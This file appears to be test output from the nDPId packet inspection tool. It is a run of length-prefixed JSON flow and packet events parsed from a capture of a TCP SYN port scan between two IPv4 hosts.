-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTUIAADEGyjCsEAAIQA2GNIzS8n7dUoMYAAAAAGACCAA+EAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsMe8AACwG6oOsEAAIQA2GNIzSD07dUoMYAAAAAGACBAAlQQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPKgAADIG2cqsEAAIQA2GNIzSAyHdUoMYAAAAAGACDAApbgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsmokAADcGdumsEAAIQA2GNIzSSp3dUoMYAAAAAGACEADd8QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAssaoAADMGY8isEAAIQA2GNIzTgA3dU4MZAAAAAGACEACofgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAs+UUAAC8GIC2sEAAIQA2GNIzTFXzdU4MZAAAAAGACEAATEAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1UAADcGRh2sEAAIQA2GNIzTArzdU4MZAAAAAGACEAAl0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAslw0AADIGf2WsEAAIQA2GNIzTC8ndU4MZAAAAAGACDAAgwwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsfFsAADIGmhesEAAIQA2GNIzTJxLdU4MZAAAAAGACDAAFegAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRAAADkGrmKsEAAIQA2GNIzTBGvdU4MZAAAAAGACCAAsIQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAskzsAADEGhDesEAAIQA2GNIzTARjdU4MZAAAAAGACCAAvdAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsr9IAADkGX6CsEAAIQA2GNIzTBzDdU4MZAAAAAGACCAApXAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsuXkAADkGVfmsEAAIQA2GNIzTG1jdU4MZAAAAAGACCAAVNAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsOXwAADEG3fasEAAIQA2GNIzTCd3dU4MZAAAAAGACCAAmrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsNxwAADQG3VasEAAIQA2GNIzTGPXdU4MZAAAAAGACBAAblwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVkAACwG9xmsEAAIQA2GNIzTBGPdU4MZAAAAAGACBAAwKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsDfUAACkGEX6sEAAIQA2GNIzTJcLdU4MZAAAAAGACCAAKygAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsmA4AADEGf2SsEAAIQA2GNIzTn8\/dU4MZAAAAAGACCACQvAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7UAACkG172sEAAIQA2GNIzTGrfdU4MZAAAAAGACCAAV1QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs4CAAACsGPVKsEAAIQA2GNIzTSp3dU4MZAAAAAGACEADd7gAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wMAADgGPW+sEAAIQA2GNIzTAyHdU4MZAAAAAGACBAAxawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC8AADgGeEOsEAAIQA2GNIzTD07dU4MZAAAAAGACBAAlPgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsWfUAADoGtH2sEAAIQA2GNIzT8n7dU4MZAAAAAGACDAA6DQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACYG5wysEAAIQA2GNIzTC+zdU4MZAAAAAGACDAAgoAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsT1UAACkG0B2sEAAIQA2GNIzTBNzdU4MZAAAAAGACCAArsAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 